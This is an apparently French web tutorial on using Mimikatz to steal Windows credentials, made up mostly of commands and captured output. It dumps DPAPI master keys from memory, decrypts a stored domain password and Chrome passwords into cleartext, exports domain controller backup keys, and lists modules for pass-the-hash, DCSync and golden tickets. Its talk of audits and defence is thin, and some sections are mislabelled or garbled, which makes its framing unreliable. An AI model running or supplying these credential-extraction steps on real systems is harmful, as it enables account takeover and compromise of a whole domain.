Ticket d'Accès Kerberos Golden

Concepts fondamentaux :

Mimikatz un outil capital en cybersécurité, dévoile avec précision les faiblesses des systèmes informatiques par ses analyses minutieuses. Adaptable aux exigences spécifiques de la sécurité, il est précieux pour renforcer les défenses informatiques.

Grâce à sa capacité à intégrer divers protocoles de sécurité, son efficacité pour accélérer les audits et sa rapidité de réaction face aux incidents, Mimikatz est indispensable pour les spécialistes de la sécurité. Il excelle notamment dans la manipulation des Tickets d'Accès Kerberos Golden, rendant cet outil essentiel pour la gestion sécurisée des accès utilisateur, et éclaire sur les meilleures pratiques de sécurisation des environnements Windows.

Mimikatz

5.0 - Tickets d'Accès Kerberos Golden

Nous nous concentrons sur les Tickets d'Accès Kerberos Golden, essentiels pour la gestion des accès dans les environnements Windows et un élément clé de Mimikatz, soulignant son rôle crucial dans la sécurisation des identifiants et des données sensibles.

Hannah Swann mimikatz/mimikatz ParrotSec

Explication : La manipulation des Tickets d'Accès Kerberos Golden, une fonctionnalité clé de Mimikatz, permet de gérer les autorisations et les accès au sein des systèmes Windows sans accéder directement aux données elles-mêmes. Cette fonctionnalité met en lumière la nécessité de sécuriser ces tickets pour prévenir les accès non autorisés et les fuites d'informations. Les mesures de défense incluent l'application de protocoles de sécurité stricts et la surveillance constante des activités suspectes pour contrer les tentatives d'intrusion.

Exclusivement sur : spear-phishing.com Plus de détails

Mimikatz

3.1 - Extraction des Clés DPAPI

L'extraction des Clés DPAPI, essentielle pour analyser et renforcer la sécurité des données sur les systèmes Windows, se réalise via des commandes spécialisées de Mimikatz. Cette opération dévoile les clés protégeant les informations sensibles, permettant ainsi une évaluation précise des vulnérabilités du système.


        
privilege::debug

        
sekurlsa::dpapi
mimikatz # privilege::debug
Privilege '20' OK

mimikatz # sekurlsa::dpapi

Authentication Id : 0 ; 439959 (00000000:0006b697) 
Session           : Interactive from 1
User Name         : Jonathan
Domain            : DESKTOP-JIRHCV0
Logon Server      : DESKTOP-JIRHCV0
Logon Time        : 01/04/2024 20:31:16
SID               : S-1-5-21-1633619405-4158850353-54172273-1001
         [00000000]
         * GUID      :  {c6f319bf-f728-4299-97b3-6031713da0cf}
         * Time      :  01/04/2024 20:51:59
         * MasterKey :  ef297506dbd8aca5aa6c9477e2fbefad243ec327e45f8a0235b6f5411
36584008884eccf791
* sha1(key) : 3fd679f3551c7d8ad3018d936c42f1a6edaf9025 Authentication Id : 0 ; 439916 (00000000:0006b66c) Session : Interactive from 1 User Name : Jonathan Domain : DESKTOP-JIRHCV0 Logon Server : DESKTOP-JIRHCV0 Logon Time : 01/04/2024 20:31:16 SID : S-1-5-21-1633619405-4158850353-54172273-1001 Authentication Id : 0 ; 997 (00000000:000003e5) Session : Service from 0 User Name : SERVICE LOCAL Domain : AUTORITE NT Logon Server : (null) Logon Time : 01/04/2024 20:30:44 SID : S-1-5-19 Authentication Id : 0 ; 68552 (00000000:00010bc8) Session : Interactive from 1 User Name : DWM-1 Domain : Window Manager Logon Server : (null) Logon Time : 01/04/2024 20:30:44 SID : S-1-5-90-0-1 Authentication Id : 0 ; 68499 (00000000:00010b93) Session : Interactive from 1 User Name : DWM-1 Domain : Window Manager Logon Server : (null) Logon Time : 01/04/2024 20:30:44 SID : S-1-5-90-0-1 Authentication Id : 0 ; 996 (00000000:000003e4) Session : Service from 0 User Name : DESKTOP-JIRHCV0$ Domain : WORKGROUP Logon Server : (null) Logon Time : 01/04/2024 20:30:43 SID : S-1-5-20 Authentication Id : 0 ; 45773 (00000000:0000b2cd) Session : Interactive from 1 User Name : UMFD-1 Domain : Font Driver Host Logon Server : (null) Logon Time : 01/04/2024 20:30:43 SID : S-1-5-96-0-1 Authentication Id : 0 ; 45709 (00000000:0000b28d) Session : Interactive from 0 User Name : UMFD-0 Domain : Font Driver Host Logon Server : (null) Logon Time : 01/04/2024 20:30:43 SID : S-1-5-96-0-0 Authentication Id : 0 ; 44178 (00000000:0000ac92) Session : UndefinedLogonType from 0 User Name : (null) Domain : (null) Logon Server : (null) Logon Time : 01/04/2024 20:30:43 SID : Authentication Id : 0 ; 999 (00000000:000003e7) Session : UndefinedLogonType from 0 User Name : DESKTOP-JIRHCV0$ Domain : WORKGROUP Logon Server : (null) Logon Time : 01/04/2024 20:30:43 SID : S-1-5-18 [00000000] * GUID : {d757d3e2-718c-4644-bc28-9a976767b8ee} * Time : 01/04/2024 20:52:02 * MasterKey : 4ddfc27fa0d5e2d47fea893799a1eae737ac00cb74e43848e2
d48691b7e9308f04745b46a29e9fe4bac1a7728aa057d633644054e542237
4a4c56600d12a11a7
* sha1(key) : 61ed77e0098a53a72fba112ce7f7494a0ecd71d9 [00000001] * GUID : {e42a22ed-0105-4f5c-a9d9-3f649c2d42f9} * Time : 01/04/2024 20:30:44 * MasterKey : 46995deb04aea17de1afef5af3d5aeafb1f8f8a2eb7d05a219e
50eb023934705738435028b0488dfa819f4728dd16123f19d56d92d18294269
* sha1(key) : a3b722cfd0f98aece7b41f428beadcf8eb6b0942 [00000002] * GUID : {d218873c-53e4-4223-a335-b4bcfb75ee2d} * Time : 01/04/2024 20:30:43 * MasterKey : 13171d590a5f91a46f0c1aaa8707adb9c6425718ab6650a8c7a4
f4681b1d748ec9b42cc8774f2d2c68172beb6d328bb2ceec84c38d4a3a089f2
e2ccaa626cc59
* sha1(key) : cd588b3c4c651df0cc15c506f1b072cf7ed00995 mimikatz #
Tableau des informations d'authentification

Tableau des informations DPAPI

Élément Intéressant Description Information Exemple
Nom d'utilisateur Nom de l'utilisateur concerné par les données DPAPI Jonathan
Domaine Domaine de l'utilisateur DESKTOP-JIRHCV0
Heure de connexion Moment de la connexion de l'utilisateur 01/04/2024 20:31:16
SID Identifiant de sécurité unique de l'utilisateur S-1-5-21-1633619405-4158850353-54172273-1001
GUID de MasterKey Identifiant unique global de la clé MasterKey {c6f319bf-f728-4299-97b3-6031713da0cf}
Heure de la MasterKey Horodatage de la création de la MasterKey 01/04/2024 20:51:59
MasterKey Clé MasterKey cryptographique en hexadécimal ef297506dbd8aca5...
Hash SHA1 de la clé Hash SHA1 de la MasterKey 3fd679f3551c7d8ad3018d936c42f1a6edaf9025
Session Type de session (Interactive, Service, etc.) Interactive from 1
Logon Server Serveur où l'ouverture de session a eu lieu DESKTOP-JIRHCV0
Type de session spéciale Sessions pour des services ou des utilisateurs systèmes spéciaux SERVICE LOCAL, DWM-1, UMFD-1, etc.
SID de la session spéciale Identifiant de sécurité pour les sessions spéciales S-1-5-19, S-1-5-90-0-1, S-1-5-96-0-1, etc.

Mimikatz

3.2 - Localiser et créer un Blob DPAPI

Localiser et créer un Blob DPAPI : Dans cette tâche, nous allons identifier et créer des données chiffrées, généralement stockées sous forme de fichiers .blob, qui sont souvent situées dans des répertoires associés à des applications ou des services spécifiques.


        
dir C:\*.blob /s /b
# Importer le module System.Security.Cryptography
Add-Type -AssemblyName System.Security

# Données à chiffrer
$donneesAChiffrer = "Données confidentielles à chiffrer."

# Chiffrer les données avec DPAPI
# Assurez-vous de ne pas diviser cette ligne
$donneesChiffrees = [System.Security.Cryptography.ProtectedData]::Protect
([System.Text.Encoding]::UTF8.GetBytes($donneesAChiffrer), $null, 'CurrentUser') # Enregistrer les données chiffrées dans un fichier .blob $cheminFichierBlob = "C:\Chemin\Vers\Le\Fichier.blob" [System.IO.File]::WriteAllBytes($cheminFichierBlob, $donneesChiffrees) Write-Host "Fichier .blob créé avec succès : $cheminFichierBlob"

Mimikatz

3.3 - Déchiffrage de données :

Le déchiffrage de données protégées par DPAPI est une étape cruciale dans la récupération d'informations sécurisées. En utilisant la clé master appropriée et en localisant les données chiffrées sur le système, il devient possible de restaurer l'accès aux informations confidentielles. Ce processus permet de déverrouiller des données sensibles tout en garantissant leur sécurité et leur intégrité.


        
dpapi::blob /in:"chemin_vers_les_données_chiffrées" /masterkey:clé_masterkey

mimikatz # dpapi::blob /in:"C:\Chemin\Vers\Le\Fichier.blob" /masterkey:ef297506dbd8
aca5aa6c9477e2fbefad243ec327e45f8a0235b6f541136584008884eccf7913756fa5832b1371ac65
c2348d4a89786b069c6fe96422ef9e514a
**BLOB** DWVersion : 00000001 - 1 GUIDProvider : {df9d8cd0-1501-11d1-8c7a-00c04fc297eb} DWMasterKeyVersion : 00000001 - 1 GUIDMasterKey : {c6f319bf-f728-4299-97b3-6031713da0cf} DWFlags : 00000000 - 0 () DWDescriptionLen : 00000002 - 2 SZDescription : ALGCrypt : 00006610 - 26128 (CALG_AES_256) DWAlgCryptLen : 00000100 - 256 DWSaltLen : 00000020 - 32 PBSalt : 7357debe729ea8b24964a7d19a0ef155546bb8d40513618fc
7045527e821043a DWHmacKeyLen : 00000000 - 0 PBHmacKey : AlgHash : 0000800e - 32782 (CALG_SHA_512) DWAlgHashLen : 00000200 - 512 DWHmac2KeyLen : 00000020 - 32 PBHmacKey : 0d98b81273ba5e95471dc4e54394cfc1c93e8058502c52e62ea
27901ee885e5b DWDataLen : 00000030 - 48 PBData : 0ad8408d6a0a9df667af6cb96fb0baa14882c51cd52014e8dff57
68cb7b555670ef25d6ac0680becd94d9f24a2cb7aed DWSignLen : 00000040 - 64 PBSign : a3e1829933c145c8ff4b225da965c624e6030844a8654b9f1f051
202ec602fe015f6046c0b934c6dfee83d1a6fca363400643fa6fd37f11939b8e406e4e4caed * Volatile Cache: GUID:{c6f319bf-f728-4299-97b3-6031713da0cf};KeyHash:3fd67
9f3551c7d8ad3018d936c42f1a6edaf9025;Key:available * Masterkey : ef297506dbd8aca5aa6c9477e2fbefad243ec327e45f8a0235b6f5411
36584008884eccf7913756fa5832b1371ac65c2348d4a89786b069c6fe96422ef9e514a
description : data: 44 6f 6e 6e c3 a9 65 73 20 63 6f 6e 66 69 64 65 6e 74 69 65 6c 6c 65
73 20 c3 a0 20 63 68 6 66 72 65 72 2e
mimikatz #
Tableau des informations d'authentification

Informations sur le BLOB DPAPI

BLOB DWVersion GUIDProvider
Cela indique que les informations suivantes concernent un fichier blob. Il s'agit de la version du fichier blob. C'est l'identifiant unique du fournisseur de services DPAPI qui a créé ce blob.
DWMasterKeyVersion GUIDMasterKey DWFlags
C'est la version de la clé maître utilisée pour chiffrer le blob. C'est l'identifiant unique de la clé maître utilisée pour chiffrer le blob. Il s'agit de drapeaux supplémentaires associés au blob.
DWDescriptionLen SZDescription ALGCrypt
C'est la longueur de la description du blob (dans ce cas, la description est vide). C'est la description du blob (dans ce cas, elle est vide). C'est l'algorithme de chiffrement utilisé pour chiffrer les données du blob.
DWAlgCryptLen DWSaltLen PBSalt
C'est la longueur de l'algorithme de chiffrement. C'est la longueur du sel utilisé pour dériver la clé de chiffrement. C'est le sel utilisé pour dériver la clé de chiffrement.
DWHmacKeyLen PBHmacKey AlgHash
C'est la longueur de la clé HMAC utilisée pour signer les données du blob. C'est la clé HMAC utilisée pour signer les données du blob. C'est l'algorithme de hachage utilisé pour signer les données du blob.
DWAlgHashLen DWHmac2KeyLen PBHmac2Key
C'est la longueur de l'algorithme de hachage. C'est la longueur de la clé HMAC utilisée pour signer les données du blob. C'est la clé HMAC utilisée pour signer les données du blob.
DWDataLen PBData DWSignLen
C'est la longueur des données chiffrées dans le blob. Ce sont les données chiffrées dans le blob. C'est la longueur de la signature des données du blob.
PBSign Volatile Cache Masterkey
C'est la signature des données du blob. Cela fournit des informations supplémentaires sur le cache volatil associé au blob. C'est la clé maître utilisée pour déchiffrer le blob.

Mimikatz

3.4 - Conversion d'Hexadécimal en Texte

L'exemple démontre la conversion d'une séquence hexadécimale en texte clair, une technique essentielle en informatique pour rendre les données binaires intelligibles. Il s'agit de transformer les hexadécimaux en bytes, puis de les convertir en texte via l'encodage UTF-8, illustrant ainsi une manière efficace de décrypter et comprendre les informations codées.


        
44 6f 6e 6e c3 a9 65 73 20 63 6f 6e 66 69 64 65 6e 74 69 65 6c 6c 65 73 20 c3 a0 20 63 68 6 66 72 65 72 2e
# Définir les données hexadécimales
$dataHex = "44 6f 6e 6e c3 a9 65 73 20 63 6f 6e 66 69 64 65 6e 74 69 65 6c 6c 65 73 
20 c3 a0 20 63 68 69 66 66 72 65 72 2e
" # Convertir les données hexadécimales en tableau de bytes $bytes = $dataHex -split ' ' | ForEach-Object { [byte]::Parse($_, 'HexNumber') } # Convertir les bytes en texte UTF-8 $texte = [System.Text.Encoding]::UTF8.GetString($bytes) # Afficher le texte $texte Données confidentielles à chiffrer.

Mimikatz

3.5 - Décryptage de credentials :

Le déchiffrage de données protégées par DPAPI est une étape cruciale dans la récupération d'informations sécurisées. En utilisant la clé master appropriée et en localisant les données chiffrées sur le système, il devient possible de restaurer l'accès aux informations confidentielles. Ce processus permet de déverrouiller des données sensibles tout en garantissant leur sécurité et leur intégrité.

Emplacements des Données d'Identification dans Windows

Dans Windows, les données d'identification des utilisateurs, telles que les mots de passe et les informations de connexion, sont sauvegardées dans des dossiers spécifiques connus sous le nom de "Credentials". Ces dossiers sont situés dans le profil de chaque utilisateur, sous C:\Users\NomUtilisateur\AppData\Local\Microsoft\Credentials pour les informations locales et C:\Users\NomUtilisateur\AppData\Roaming\Microsoft\Credentials pour les informations qui peuvent être partagées entre plusieurs machines dans un domaine. Ces emplacements stockent des informations cruciales pour l'authentification et l'accès aux ressources et services.

Leur connaissance est essentielle pour la gestion des comptes utilisateur et peut être particulièrement utile pour les administrateurs système et les professionnels de la sécurité informatique cherchant à sécuriser ou à auditer les systèmes Windows.

Pour masquer les fichiers système protégés (les rendre invisibles) :

PowerShell :

Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" -Name "ShowSuperHidden" -Value 0

Invite de commande (CMD) :

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f

Pour afficher les fichiers système protégés (les rendre visibles) :

PowerShell :

Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" -Name "ShowSuperHidden" -Value 1

Invite de commande (CMD) :

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 1 /f

        
dpapi::cred /in:"chemin_vers_les_credentials" /masterkey:clé_masterkey

mimikatz # dpapi::cred /in:"C:\Users\Jonathan\AppData\Roaming\Microsoft\
Credentials\44A50D09E7C>86FBBCA83485A9D1BBDCE" /masterkey:ef297506dbd8aca5aa6c9
477e2fbefad243ec327e45f8a0235b6f541136584008884eccf7913756fa5832
b1371ac65c2348d4a89786b069c6fe96422ef9e514a
**BLOB** DWVersion : 00000001 - 1 GUIDProvider : {df9d8cd0-1501-11d1-8c7a-00c04fc297eb} DWMasterKeyVersion : 00000001 - 1 GUIDMasterKey : {c6f319bf-f728-4299-97b3-6031713da0cf} DWFlags : 20000000 - 536870912 (system ; ) DWDescriptionLen : 00000050 - 80 SZDescription : Données d’identification d’entreprise ALGCrypt : 00006610 - 26128 (CALG_AES_256) DWAlgCryptLen : 00000100 - 256 DWSaltLen : 00000020 - 32 PBSalt : a22d21e77314cf08e973409f45389e109b5f966c3fc189dd1d0914
09ee440017 DWHmacKeyLen : 00000000 - 0 PBHmacKey : AlgHash : 0000800e - 32782 (CALG_SHA_512) DWAlgHashLen : 00000200 - 512 DWHmac2KeyLen : 00000020 - 32 PBHmacKey : 6791e1d1277b68bdaeaf193df083da29a5d88c9e9fe072e307a
71620d8b9abb8 DWDataLen : 000000b0 - 176 PBData : d520f690753985b50ead059d0b0e2f02f812042a8428b859
64247f88b90f4f1b7b934b82b543cabe8eadcdd351ab8c1686885b72e2b
e0aac9427401e739becf524214f69cf8aa26bfdedee5a88b2f1a03c2af2ea04adaa2a193
32ee3d929d07a37bc5c15ee78ff8ceff74ef9133c293618e805e82b68
70f3e9ac67f2953601fc060d06aedb730d9d80e7750b844bb6e9a
d4b102375fb53be81559545d0ff39d6fb3c5f2cbce74280d2e02206e23fd79d DWSignLen : 00000040 - 64 PBSign : 72fc9e440a192f0c2e97d148d3921f2ec2f7c93ca3eca2f316
a1296274cad5d49fa48330ce66fe0cf86ba03b1db7a184442052851c1
607630cad31e59690b1e1 Decrypting Credential: * volatile cache: GUID:{c6f319bf-f728-4299-97b3-6031713da0cf};KeyHash:3fd
679f3551c7d8ad3018d936c42f1a6edaf9025;Key:available * masterkey : 00f297506dbd8aca5aa6c9477e2fbefad243ec327e45f8a0235b6f
541136584008884eccf7913756fa5832b1371ac65c2348d4a89786b06
9c6fe96422ef9e5140a **CREDENTIAL** credFlags : 00000030 - 48 credSize : 000000a0 - 160 credUnk0 : 00000000 - 0 Type : 00000002 - 2 - domain_password Flags : 00000000 - 0 LastWritten : 01/04/2024 18:35:29 unkFlagsOrSize : 00000010 - 16 Persist : 00000003 - 3 - enterprise AttributeCount : 00000000 - 0 unk0 : 00000000 - 0 unk1 : 00000000 - 0 TargetName : Domain:target=192.168.12.78 UnkData : (null) Comment : (null) TargetAlias : (null) UserName : Admin45 CredentialBlob : Zenxah77 Attributes : 0 mimikatz #

Mimikatz

3.6 - Accès aux Mots de Passe de Navigateur

L'outil dpapi::chrome de Mimikatz permet de déchiffrer et d'afficher les mots de passe stockés dans Google Chrome, en utilisant la clé master de Windows DPAPI. Cette commande est essentielle pour les experts en sécurité qui cherchent à analyser les données d'authentification sauvegardées sur un système, tout en respectant les normes éthiques et légales.


        
dpapi::chrome /in:"C:\Users\Jonathan\AppData\Local\Google\Chrome\User Data\Default\Login Data" /masterkey:ef297506dbd8aca5aa6c9477e2fbefad243ec327e45f8a0235b6f541136584008884eccf7913756fa5832b1371ac65c2348d4a89786b069c6fe96422ef9e514a
 
mimikatz # dpapi::chrome /in:"C:\Users\Jonathan\AppData\Local\Google\Chrome
\User Data\Default\Login Data" /masterkey:ef297506dbd8aca5aa6c9477e2fbefad243ec3
27e45f8a0235b6f541136584008884eccf7913756fa5832b1371ac65c2348d4a89786b069c6fe
96422ef9e514a
> Encrypted Key found in local state file > Encrypted Key seems to be protected by DPAPI * volatile cache: GUID:{5c22983f-77ee-41e4-9086-8073d664e417};KeyHash:850247e2d
d89c50536c05bdcee1a56c395e752cf;Key:available * masterkey : ef297506dbd8aca5aa6c9477e2fbefad243ec327e45f8a0235b6f541136584
008884eccf7913756fa5832b1371ac65c2348d4a89786b069c6fe96422ef9e514a
> AES Key is: fd0635bf2e19d76231f649f48f4a90df3de80d3f83aa5ad016b3155fdab37fa2 URL : https://login.live.com/ ( https://login.live.com/login.srf ) Username: exemple@hotmail.com * using BCrypt with AES-256-GCM Password: MyPassword

Mimikatz

3.7 - Extraction de Clés LSA :

La commande lsadump::backupkeys est essentielle pour sécuriser les informations d'identification dans un réseau Active Directory. Elle permet d'extraire et de sauvegarder les clés LSA d'un contrôleur de domaine, assurant une récupération sécurisée en cas d'urgence. C'est une pratique de sécurité proactive pour protéger l'accès aux données sensibles.


        
lsadump::backupkeys /system:nom_hôte_du_contrôleur_de_domaine /export

mimikatz # lsadump::backupkeys /export
Current prefered key:       {e3364acb-379c-4775-bef7-c3c1e1992589}
  * RSA key
        |Provider name : Microsoft Strong Cryptographic Provider
        |Unique name   :
        |Implementation: CRYPT_IMPL_SOFTWARE ;
        Algorithm      : CALG_RSA_KEYX
        Key Size       : 2048 (0x00000800)
        Key permissions: 0000003f ( CRYPT_ENCRYPT ; CRYPT_DECRYPT ; CRYPT_EXPORT ; 
CRYPT_READ ; CRYPT_WRITE ; CRYPT_MAC
; ) Exportable key: YES Private export : OK - 'ntds_capi_0_e3364acb-379c-4775-bef7-c3c1e19925
89.keyx.rsa.pvk'
PFX container : OK - 'ntds_capi_0_e3364acb-379c-4775-bef7-c3c1e1992
589.pfx'
Export : OK - 'ntds_capi_0_e3364acb-379c-4775-bef7-c3c1e199
2589.der'
Compatibility prefered key: {b799ff33-a573-444f-bc86-b8aeb36fcb3f} * Legacy key 561acf46e03db74112af7412402415d80dfe92b0fbf57588358647007d46f28f 8f6ca1990c0fee951bd52e69e9bdfbf9c8e07be0033dff21a71d192447668096 f6e1199e5b8b61fb3ffb758a92757efe863307cefd7d773476053286c08dc7c6 87671f0e7374ccc179e6cf718673beb80dfe12bf03c7914a767a959b66478498 14527ee085f014c7574d9b9388dae00f42ee91f96e97c8272d6955e51e2d7304 67be8b32a706203bacf3abaca3d9f1ec90e4d63290e39d2e6c2465fc0e195b7a 2baadcb281537863a37c2e0f76d025ecb7a23b81970dbe2ab8e77b3b2fb617d7 bb7b81126e17a60d3023b0b8db159dd927f49136ce14f29565d3d9794d2f9c79 Export : OK - 'ntds_legacy_0_b799ff33-a573-444f-bc86-b8aeb36
fcb3f.key'
mimikatz #

Différence Entre les Commandes lsadump::backupkeys

La principale différence entre les commandes lsadump::backupkeys /export et lsadump::backupkeys /system:<nom_hôte_du_contrôleur_de_domaine> /export réside dans leur cible :

  • lsadump::backupkeys /export : extrait les clés de sauvegarde du système local sur lequel Mimikatz est exécuté.
  • lsadump::backupkeys /system:<nom_hôte_du_contrôleur_de_domaine> /export : cible un contrôleur de domaine spécifique par son nom d'hôte pour extraire les clés de sauvegarde à distance.
Tableau des informations d'authentification

Récapitulatif des Clés LSA et RSA via Mimikatz

Attribut Description Valeur
Current Preferred Key Clé RSA actuellement préférée par le système {e3364acb-379c-4775-bef7-c3c1e1992589}
Provider Name Nom du fournisseur de la clé Microsoft Strong Cryptographic Provider
Implementation Type d'implémentation de la clé CRYPT_IMPL_SOFTWARE
Algorithm Algorithme de la clé CALG_RSA_KEYX
Key Size Taille de la clé en bits 2048
Key Permissions Permissions de la clé CRYPT_ENCRYPT; CRYPT_DECRYPT; CRYPT_EXPORT; CRYPT_READ; CRYPT_WRITE; CRYPT_MAC
Exportable Key Si la clé est exportable YES
Private Export Fichier d'exportation de la clé privée ntds_capi_0_e3364acb-379c-4775-bef7-c3c1e1992589.keyx.rsa.pvk
PFX Container Fichier PFX contenant la clé ntds_capi_0_e3364acb-379c-4775-bef7-c3c1e1992589.pfx
Export Fichier d'exportation de la clé publique ntds_capi_0_e3364acb-379c-4775-bef7-c3c1e1992589.der
Compatibility Preferred Key Clé de compatibilité préférée {b799ff33-a573-444f-bc86-b8aeb36fcb3f}
Legacy Key Export Fichier d'exportation de la clé Legacy ntds_legacy_0_b799ff33-a573-444f-bc86-b8aeb36fcb3f.key

Utilisation de Mimikatz pour l'Audit de Sécurité

Après l'extraction des clés via la commande lsadump::backupkeys /export, voici comment les utiliser efficacement dans un audit de sécurité :


1. Analyse et Utilisation des Clés Extraires

Les clés RSA et Legacy peuvent déchiffrer des données sécurisées telles que les mots de passe dans NTDS.dit ou protégées par DPAPI.


2. Déchiffrement de NTDS.dit

Utilisez les clés pour révéler des hash de mots de passe et autres informations critiques en déchiffrant le fichier NTDS.dit.

Outil recommandé : ntdsutil, esentutl.


3. Accès à des Données Protégées par DPAPI

Déchiffrez des données protégées par DPAPI, incluant les mots de passe de navigateur et les fichiers BitLocker.

Commande Mimikatz : dpapi::cred ou dpapi::masterkey.


4. Simulation d'Attaques Pass-the-Hash/Ticket

Simulez des attaques pour tester la résilience des systèmes et des applications.


5. Recommandations de Sécurité

Changez les clés LSA accessibles, auditez les comptes à risque et renforcez la protection de NTDS.dit.


Conclusion

Ces actions doivent être entreprises avec prudence et uniquement dans un cadre légal, visant à identifier et corriger les vulnérabilités.


        
nomDuModule::
mimikatz # sekurlsa::

Module :        sekurlsa
Full name :     SekurLSA module
Description :   Some commands to enumerate credentials...

             msv  -  Lists LM & NTLM credentials
         wdigest  -  Lists WDigest credentials
        kerberos  -  Lists Kerberos credentials
           tspkg  -  Lists TsPkg credentials
         livessp  -  Lists LiveSSP credentials
             ssp  -  Lists SSP credentials
  logonPasswords  -  Lists all available providers credentials
         process  -  Switch (or reinit) to LSASS process  context
        minidump  -  Switch (or reinit) to LSASS minidump context
             pth  -  Pass-the-hash
          krbtgt  -  krbtgt!
     dpapisystem  -  DPAPI_SYSTEM secret
           trust  -  Antisocial
      backupkeys  -  Preferred Backup Master keys
         tickets  -  List Kerberos tickets
           ekeys  -  List Kerberos Encryption Keys
           dpapi  -  List Cached MasterKeys
         credman  -  List Credentials Manager


mimikatz # kerberos::

Module :        kerberos
Full name :     Kerberos package module
Description :

             ptt  -  Pass-the-ticket [NT 6]
            list  -  List ticket(s)
             ask  -  Ask or get TGS tickets
             tgt  -  Retrieve current TGT
           purge  -  Purge ticket(s)
          golden  -  Willy Wonka factory
            hash  -  Hash password to keys
             ptc  -  Pass-the-ccache [NT6]
           clist  -  List tickets in MIT/Heimdall ccache


mimikatz # crypto::

Module :        crypto
Full name :     Crypto Module

Description :

       providers  -  List cryptographic providers
          stores  -  List cryptographic stores
    certificates  -  List (or export) certificates
            keys  -  List (or export) keys containers
              sc  -  List smartcard readers
            hash  -  Hash a password with optional username
          system  -  Describe a Windows System Certificate 
(file, TODO:registry or hive) scauth - Create a authentication certitifate
(smartcard like) from a CA certtohw - Try to export a software CA to a crypto
(virtual)hardware capi - [experimental] Patch CryptoAPI layer
for easy export cng - [experimental] Patch CNG service for
easy export extract - [experimental] Extract keys from CAPI
RSA/AES provider mimikatz # lsadump:: Module : lsadump Full name : LsaDump module Description : sam - Get the SysKey to decrypt SAM
entries (from registry or hives) secrets - Get the SysKey to decrypt SECRETS
entries (from registry or hives) cache - Get the SysKey to decrypt NL$KM then
MSCache(v2) (from registry or hives) lsa - Ask LSA Server to retrieve SAM/AD
entries (normal, patch on the fly or inject) trust - Ask LSA Server to retrieve Trust Auth
Information (normal or patch on the fly) backupkeys rpdata dcsync - Ask a DC to synchronize an object dcshadow - They told me I could be anything I
wanted, so I became a domain controller setntlm - Ask a server to set a new password
/ntlm for one user changentlm - Ask a server to set a new password
/ntlm for one user netsync - Ask a DC to send current and previous
NTLM hash of DC/SRV/WKS packages mimikatz # vault:: Module : vault Full name : Windows Vault/Credential module list - list cred - cred mimikatz # token:: Module : token Full name : Token manipulation module Description : Module de manipulation de jetons whoami - Display current identity list - List all tokens of the system elevate - Impersonate a token run - Run! revert - Revert to proces token mimikatz # process:: Module : process Full name : Process module list - List process exports - List exports imports - List imports start - Start a process stop - Terminate a process suspend - Suspend a process resume - Resume a process run - Run! runp - mimikatz # net:: Module : net Full name : user - group - alias - session - wsession - tod - stats - share - serverinfo - trust - deleg - mimikatz # misc:: Module : misc Full name : Miscellaneous module cmd - Command Prompt (without DisableCMD) regedit - Registry Editor (without DisableRegistryTools) taskmgr - Task Manager (without DisableTaskMgr) ncroutemon - Juniper Network Connect (without route monitoring) detours - [experimental] Try to enumerate all modules with
Detours-like hooks memssp skeleton compressme lock wp mflt easyntlmchall clip mimikatz # dpapi:: Module : dpapi Full name : DPAPI Module (by API or RAW access) Description : Data Protection application programming interface blob - Describe a DPAPI blob, unprotect it with API or Masterkey protect - Protect a data via a DPAPI call masterkey - Describe a Masterkey file, unprotect each Masterkey
(key depending) credhist - Describe a Credhist file capi - CAPI key test cng - CNG key test cred - CRED test vault - VAULT test wifi - WiFi test wwan - Wwan test chrome - Chrome test ssh - SSH Agent registry cache rdg - RDG saved passwords ps - PowerShell credentials (PSCredentials or SecureString) cache mimikatz # sid:: Module : sid Full name : Security Identifiers module lookup - Name or SID lookup query - Query object by SID or name modify - Modify object SID of an object add - Add a SID to sIDHistory of an object clear - Clear sIDHistory of an object patch - Patch NTDS Service mimikatz # privilege:: Module : privilege Full name : Privilege module debug - Ask debug privilege driver - Ask load driver privilege security - Ask security privilege tcb - Ask tcb privilege backup - Ask backup privilege restore - Ask restore privilege sysenv - Ask system environment privilege id - Ask a privilege by its id name - Ask a privilege by its name

Page suivante